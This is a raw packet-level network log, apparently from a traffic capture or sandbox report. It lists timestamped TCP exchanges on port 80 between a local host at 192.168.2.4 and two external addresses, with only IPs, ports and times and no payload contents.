              Jan 10, 2025 08:59:21.251688004 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:21.251688004 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:21.251701117 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:21.251714945 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:21.251729012 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:21.251729012 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:21.251754045 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:21.252132893 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:21.252147913 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:21.252161980 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:21.252171040 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:21.252176046 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:21.252196074 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:21.292093992 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:24.836150885 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.836173058 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.836189032 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.836208105 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.836222887 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.836237907 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.836253881 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.836267948 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.836283922 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.836383104 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:24.836570978 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.836618900 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.836646080 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:24.836656094 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.836689949 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.836714029 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:24.836724043 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.836756945 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.836771965 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:24.836791039 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.836822987 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.836847067 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:24.836857080 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.836890936 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.836906910 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:24.836925030 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.836960077 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.836967945 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:24.837080002 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.837112904 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.837146997 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.837146997 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:24.837179899 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.837208033 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:24.837208033 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:24.837212086 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.837244034 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.837268114 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:24.837276936 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.837308884 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.837332010 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:24.837341070 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.837373018 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.837399006 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:24.837425947 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.837457895 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.837483883 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:24.837491035 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.837524891 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.837538004 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:24.837606907 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.837656021 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.837681055 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:24.837702036 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.837733984 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.837764025 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:24.837766886 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.837799072 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.837825060 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:24.837831974 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.837867022 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.837882996 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:24.837908983 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.837945938 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.837971926 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:24.838052988 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.838084936 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.838099003 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:24.838118076 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.838150978 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.838176966 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:24.838184118 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.838217974 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.838243008 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:24.838387012 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.838419914 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.838444948 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:24.838452101 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.838484049 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.838507891 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:24.838515043 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.838546991 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.838571072 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:24.838579893 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.838613033 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.838635921 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:24.886161089 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:24.977670908 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.977714062 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.977751970 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.977785110 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.977840900 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.977902889 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.977952003 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.977984905 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.978017092 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.978049994 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.978104115 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:24.978104115 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:24.978128910 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.978163004 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.978195906 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.978203058 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:24.978203058 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:24.978229046 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.978229046 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:24.978262901 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.978298903 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.978327036 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.978358984 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.978391886 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.978409052 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:24.978409052 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:24.978409052 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:24.978423119 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.978455067 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.978471041 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.978504896 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.978507996 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:24.978538036 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:24.978545904 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.978579044 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.978610039 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.978615046 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:24.978641033 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.978666067 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:24.978673935 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.978708029 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.978720903 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:24.978739023 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.978770971 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.978797913 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:24.978802919 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.978835106 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.978861094 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:24.978868008 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.978900909 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.978918076 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:24.978935957 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.978967905 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.978977919 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:24.979001045 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.979034901 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.979053020 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:24.979063034 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.979104996 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.979109049 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:24.979136944 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.979170084 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.979202032 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:24.979219913 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.979253054 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.979266882 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:24.979285002 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.979337931 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.979338884 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:24.979373932 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.979407072 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.979418993 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:24.979439974 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.979471922 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.979487896 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:24.979505062 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.979537964 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.979553938 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:24.979571104 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.979603052 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.979635000 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:24.979635954 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.979671955 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.979693890 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:24.979809999 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.979844093 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:24.979865074 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:25.026652098 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:25.050209999 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.050254107 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.050319910 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.050370932 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.050405025 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.050404072 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:25.050440073 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.050467014 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.050517082 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.050554037 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.050554991 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:25.050554991 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:25.050580978 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:25.050585985 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.050626040 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.050633907 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:25.050654888 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.050688028 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.050719976 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.050745964 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:25.050751925 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.050772905 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:25.050786972 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.050832987 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:25.050837040 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.050893068 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.050925970 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.050947905 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:25.050957918 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.050990105 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.051023006 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.051028013 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:25.051054001 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.051075935 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:25.051090956 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.051121950 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.051132917 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:25.051156044 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.051187038 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.051197052 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:25.051218987 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.051253080 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.051285982 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.051294088 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:25.051347971 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.051348925 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:25.051381111 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.051424026 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:25.051429987 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.051462889 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.051495075 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.051506996 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:25.051527023 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.051558971 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.051573038 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:25.051609993 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.051644087 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.051652908 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:25.051676035 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.051707983 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.051721096 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:25.051740885 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.051772118 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.051776886 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:25.051803112 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.051835060 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.051847935 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:25.051867962 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.051901102 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.051914930 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:25.051934004 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.051969051 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.051983118 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:25.052104950 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.052136898 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.052160025 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:25.052170038 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.052201986 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.052228928 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:25.052234888 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.052268982 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.052301884 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.052299976 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:25.052334070 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.052366018 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:25.052366972 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.052398920 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.052422047 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:25.052432060 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.052474976 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:25.213021040 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.213090897 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.213129044 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.213180065 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.213238955 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.213268995 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:25.213289976 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.213324070 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.213356972 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.213390112 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.213421106 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.213470936 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.213483095 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:25.213484049 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:25.213484049 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:25.213504076 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.213521957 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:25.213538885 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.213572979 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.213604927 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:25.213606119 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.213660955 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.213668108 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:25.213696003 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.213728905 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.213740110 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:25.213759899 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.213792086 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.213829994 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:25.213855028 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.213888884 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.213913918 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:25.213921070 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.213953018 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.213984966 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.214018106 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.214050055 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.214056015 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:25.214082003 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.214129925 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.214162111 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:25.214162111 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.214194059 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.214226007 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.214257956 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.214286089 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:25.214289904 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.214322090 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.214354038 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.214380980 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:25.214385986 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.214418888 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.214422941 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:25.214452982 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.214484930 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:25.214505911 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.214538097 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.214570045 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.214601994 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.214622021 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:25.214637041 CET8049736147.124.216.113192.168.2.4
              Jan 10, 2025 08:59:25.214715958 CET4973680192.168.2.4147.124.216.113
              Jan 10, 2025 08:59:26.026748896 CET4975180192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:26.032625914 CET8049751166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:26.032727957 CET4975180192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:26.032896042 CET4975180192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:26.037787914 CET8049751166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:26.037870884 CET4975180192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:26.120893955 CET4975280192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:26.126274109 CET8049752166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:26.126398087 CET4975280192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:26.133274078 CET4975280192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:26.138402939 CET8049752166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:27.068224907 CET8049752166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:27.068283081 CET8049752166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:27.068363905 CET4975280192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:27.216299057 CET4975280192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:27.221113920 CET8049752166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:27.386746883 CET4975380192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:27.391587019 CET8049753166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:27.391655922 CET4975380192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:27.391916037 CET4975380192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:27.395328999 CET4975480192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:27.396660089 CET8049753166.62.27.188192.168.2.4
              Jan 10, 2025 08:59:27.396704912 CET4975380192.168.2.4166.62.27.188
              Jan 10, 2025 08:59:27.400142908 CET8049754166.62.27.188192.168.2.4
